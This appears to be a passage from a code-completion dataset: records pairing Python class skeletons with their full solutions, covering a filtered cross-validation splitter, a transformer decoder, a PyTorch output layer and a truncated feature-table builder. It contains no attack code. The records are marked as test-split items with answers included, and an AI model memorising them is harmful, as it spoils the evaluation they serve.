`FilteredLeaveOneGroupOut` described below.\n\nClass description:\nCustom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\n\nMethod signatures and docstrings:\n- def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None): Initialize the model.\n- def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator: Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.\n\n<|skeleton|>\nclass FilteredLeaveOneGroupOut:\n \"\"\"Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\"\"\"\n\n def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None):\n \"\"\"Initialize the model.\"\"\"\n <|body_0|>\n\n def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator:\n \"\"\"Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(FilteredLeaveOneGroupOut, self).__init__()\n self.keep = keep\n self.example_ids = example_ids\n self._warned = False\n self.logger = logger if logger else logging.getLogger(__name__)\n<|end_body_0|>\n\n<|body_start_1|>\n for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)\n<|end_body_1|>\n", "revision_id": "b10ce3963620d8679a1ce82ccb2268f7ea5fb9c9", "skeleton": "<|skeleton|>\nclass FilteredLeaveOneGroupOut:\n \"\"\"Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\"\"\"\n\n def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None):\n \"\"\"Initialize the model.\"\"\"\n <|body_0|>\n\n def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator:\n \"\"\"Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FilteredLeaveOneGroupOut:\n \"\"\"Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\"\"\"\n\n def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None):\n \"\"\"Initialize the model.\"\"\"\n super(FilteredLeaveOneGroupOut, self).__init__()\n self.keep = keep\n self.example_ids = example_ids\n self._warned = False\n self.logger = logger if logger else logging.getLogger(__name__)\n\n def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator:\n \"\"\"Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.\"\"\"\n for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)\n", "source": "the_stack_v2_python_sparse", "source_path": "skll/learner/utils.py", "source_repo": "EducationalTestingService/skll", "split": "test", "star_events_count": 320} {"blob_id": "446f93db141f6f425732417fb84e211bbd69465d", "bodies": ["super().__init__()\nself.N = N\nself.dm = dm\nself.embedding = tf.keras.layers.Embedding(target_vocab, dm)\nself.positional_encoding = positional_encoding(max_seq_len, dm)\nself.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\nself.dropout = tf.keras.layers.Dropout(drop_rate)", "seq_len = tf.shape(x)[1]\nattention_weights = {}\nx = self.embedding(x)\nx *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\nx += self.positional_encoding[:, :seq_len, :]\nx = self.dropout(x, training=training)\nfor i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\nattention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\nattention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\nreturn (x, attention_weights)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.N = N\n self.dm = dm\n self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\n self.positional_encoding = positional_encoding(max_seq_len, dm)\n self.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\n self.dropout = tf.keras.layers.Dropout(drop_rate)\n<|end_body_0|>\n\n<|body_start_1|>\n seq_len = tf.shape(x)[1]\n attention_weights = {}\n x = self.embedding(x)\n x *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\n x += self.positional_encoding[:, :seq_len, :]\n x = self.dropout(x, training=training)\n for i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\n attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return (x, attention_weights)\n<|end_body_1|>\n", "class_docstring": "class Decoder", "class_name": "Decoder", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Decoder:\n \"\"\"class Decoder\"\"\"\n\n def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1):\n \"\"\"* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\"\"\"\n <|body_0|>\n\n def call(self, x, encoder_output, training, look_ahead_mask, padding_mask):\n \"\"\"* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.N = N\n self.dm = dm\n self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\n self.positional_encoding = positional_encoding(max_seq_len, dm)\n self.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\n self.dropout = tf.keras.layers.Dropout(drop_rate)\n<|end_body_0|>\n\n<|body_start_1|>\n seq_len = tf.shape(x)[1]\n attention_weights = {}\n x = self.embedding(x)\n x *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\n x += self.positional_encoding[:, :seq_len, :]\n x = self.dropout(x, training=training)\n for i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\n attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return (x, attention_weights)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000445", "length_bytes": 18002, "license_type": "no_license", "methods": [{"docstring": "* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie", "name": "__init__", "signature": "def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1)"}, {"docstring": "* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output", "name": "call", "signature": "def call(self, x, encoder_output, training, look_ahead_mask, padding_mask)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000616", "prompt": "Implement the Python class `Decoder` described below.\n\nClass description:\nclass Decoder\n\nMethod signatures and docstrings:\n- def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1): * N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\n- def call(self, x, encoder_output, training, look_ahead_mask, padding_mask): * x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output", "prompted_full_text": "Implement the Python class `Decoder` described below.\n\nClass description:\nclass Decoder\n\nMethod signatures and docstrings:\n- def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1): * N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\n- def call(self, x, encoder_output, training, look_ahead_mask, padding_mask): * x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\n\n<|skeleton|>\nclass Decoder:\n \"\"\"class Decoder\"\"\"\n\n def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1):\n \"\"\"* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\"\"\"\n <|body_0|>\n\n def call(self, x, encoder_output, training, look_ahead_mask, padding_mask):\n \"\"\"* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.N = N\n self.dm = dm\n self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\n self.positional_encoding = positional_encoding(max_seq_len, dm)\n self.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\n self.dropout = tf.keras.layers.Dropout(drop_rate)\n<|end_body_0|>\n\n<|body_start_1|>\n seq_len = tf.shape(x)[1]\n attention_weights = {}\n x = self.embedding(x)\n x *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\n x += self.positional_encoding[:, :seq_len, :]\n x = self.dropout(x, training=training)\n for i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\n attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return (x, attention_weights)\n<|end_body_1|>\n", "revision_id": "8ad4c2594ff78b345dbd92e9d54d2a143ac4071a", "skeleton": "<|skeleton|>\nclass Decoder:\n \"\"\"class Decoder\"\"\"\n\n def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1):\n \"\"\"* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\"\"\"\n <|body_0|>\n\n def call(self, x, encoder_output, training, look_ahead_mask, padding_mask):\n \"\"\"* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Decoder:\n \"\"\"class Decoder\"\"\"\n\n def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1):\n \"\"\"* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\"\"\"\n super().__init__()\n self.N = N\n self.dm = dm\n self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\n self.positional_encoding = positional_encoding(max_seq_len, dm)\n self.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\n self.dropout = tf.keras.layers.Dropout(drop_rate)\n\n def call(self, x, encoder_output, training, look_ahead_mask, padding_mask):\n \"\"\"* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\"\"\"\n seq_len = tf.shape(x)[1]\n attention_weights = {}\n x = self.embedding(x)\n x *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\n x += self.positional_encoding[:, :seq_len, :]\n x = self.dropout(x, training=training)\n for i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\n attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return (x, attention_weights)\n", "source": "the_stack_v2_python_sparse", "source_path": "supervised_learning/0x12-transformer_apps/5-transformer.py", "source_repo": "jorgezafra94/holbertonschool-machine_learning", "split": "test", "star_events_count": 1} {"blob_id": "88000392ff7ed945a764d5d379e590379727bad8", "bodies": ["super().__init__()\nself.hid_dim = hid_dim\nself.seq_cont_dim = seq_cont_dim\nself.non_seq_cont_dim = non_seq_cont_dim\nself.emb_seq_num_classes = emb_seq_num_classes\nself.emb_non_seq_num_classes = emb_non_seq_num_classes\nself.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\nself.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\nself.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\nself.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\nself.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None", "decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\ndecoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\ndevice = decoder_output.device\nseq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\nseq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), device=device)\nnon_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in self.linear_non_seq_cat]\nnon_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\nreturn (seq_cat, seq_cont, non_seq_cat, non_seq_cont)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.hid_dim = hid_dim\n self.seq_cont_dim = seq_cont_dim\n self.non_seq_cont_dim = non_seq_cont_dim\n self.emb_seq_num_classes = emb_seq_num_classes\n self.emb_non_seq_num_classes = emb_non_seq_num_classes\n self.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\n self.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\n self.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\n self.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\n self.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None\n<|end_body_0|>\n\n<|body_start_1|>\n decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\n decoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\n device = decoder_output.device\n seq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\n seq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), device=device)\n non_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in self.linear_non_seq_cat]\n non_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\n return (seq_cat, seq_cont, non_seq_cat, non_seq_cont)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "OutputLayer", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OutputLayer:\n\n def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes):\n \"\"\"Initialize model with params.\"\"\"\n <|body_0|>\n\n def forward(self, decoder_output):\n \"\"\"Run a forward pass of model over the data.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.hid_dim = hid_dim\n self.seq_cont_dim = seq_cont_dim\n self.non_seq_cont_dim = non_seq_cont_dim\n self.emb_seq_num_classes = emb_seq_num_classes\n self.emb_non_seq_num_classes = emb_non_seq_num_classes\n self.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\n self.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\n self.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\n self.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\n self.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None\n<|end_body_0|>\n\n<|body_start_1|>\n decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\n decoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\n device = decoder_output.device\n seq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\n seq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), device=device)\n non_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in self.linear_non_seq_cat]\n non_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\n return (seq_cat, seq_cont, non_seq_cat, non_seq_cont)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000446", "length_bytes": 15906, "license_type": "permissive", "methods": [{"docstring": "Initialize model with params.", "name": "__init__", "signature": "def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes)"}, {"docstring": "Run a forward pass of model over the data.", "name": "forward", "signature": "def forward(self, decoder_output)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000030", "prompt": "Implement the Python class `OutputLayer` described below.\n\nClass description:\nImplement the OutputLayer class.\n\nMethod signatures and docstrings:\n- def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes): Initialize model with params.\n- def forward(self, decoder_output): Run a forward pass of model over the data.", "prompted_full_text": "Implement the Python class `OutputLayer` described below.\n\nClass description:\nImplement the OutputLayer class.\n\nMethod signatures and docstrings:\n- def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes): Initialize model with params.\n- def forward(self, decoder_output): Run a forward pass of model over the data.\n\n<|skeleton|>\nclass OutputLayer:\n\n def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes):\n \"\"\"Initialize model with params.\"\"\"\n <|body_0|>\n\n def forward(self, decoder_output):\n \"\"\"Run a forward pass of model over the data.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.hid_dim = hid_dim\n self.seq_cont_dim = seq_cont_dim\n self.non_seq_cont_dim = non_seq_cont_dim\n self.emb_seq_num_classes = emb_seq_num_classes\n self.emb_non_seq_num_classes = emb_non_seq_num_classes\n self.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\n self.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\n self.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\n self.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\n self.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None\n<|end_body_0|>\n\n<|body_start_1|>\n decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\n decoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\n device = decoder_output.device\n seq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\n seq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), device=device)\n non_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in self.linear_non_seq_cat]\n non_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\n return (seq_cat, seq_cont, non_seq_cat, non_seq_cont)\n<|end_body_1|>\n", "revision_id": "9cdbf270487751a0ad6862b2fea2ccc0e23a0b67", "skeleton": "<|skeleton|>\nclass OutputLayer:\n\n def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes):\n \"\"\"Initialize model with params.\"\"\"\n <|body_0|>\n\n def forward(self, decoder_output):\n \"\"\"Run a forward pass of model over the data.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OutputLayer:\n def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes):\n \"\"\"Initialize model with params.\"\"\"\n super().__init__()\n self.hid_dim = hid_dim\n self.seq_cont_dim = seq_cont_dim\n self.non_seq_cont_dim = non_seq_cont_dim\n self.emb_seq_num_classes = emb_seq_num_classes\n self.emb_non_seq_num_classes = emb_non_seq_num_classes\n self.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\n self.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\n self.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\n self.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\n self.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None\n\n def forward(self, decoder_output):\n \"\"\"Run a forward pass of model over the data.\"\"\"\n decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\n decoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\n device = decoder_output.device\n seq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\n seq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), device=device)\n non_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in self.linear_non_seq_cat]\n non_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\n return (seq_cat, seq_cont, non_seq_cat, non_seq_cont)\n", "source": "the_stack_v2_python_sparse", "source_path": "caspr/models/model_wrapper.py", "source_repo": "microsoft/CASPR", "split": "test", "star_events_count": 29} {"blob_id": "3252fc340b907aa0d154ff0aeceecba6cdd11b0b", "bodies": ["self.df = df\nself.table_list = []\nself.table_index = 0\nself.feature_list = feature_list\nself.prefix_list = prefix_list", "self.df[feature] = self.df[feature].astype('category')\nfeature_id = self.df[feature].cat.categories\nfeature_index = range(1, len(feature_id) + 1)\nif feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\nelse:\n feature_dict = dict(zip(feature_id, feature_index))\nreturn feature_dict", "feature_dict = self.get_feature_dict(feature_name)\nindex_in_group = 1\nfor key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)", "for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\ntable_size = len(self.table_list)\ntable_dict = OrderedDict()\ntable_dict['size'] = table_size\ntable_dict['values'] = self.table_list\nwith 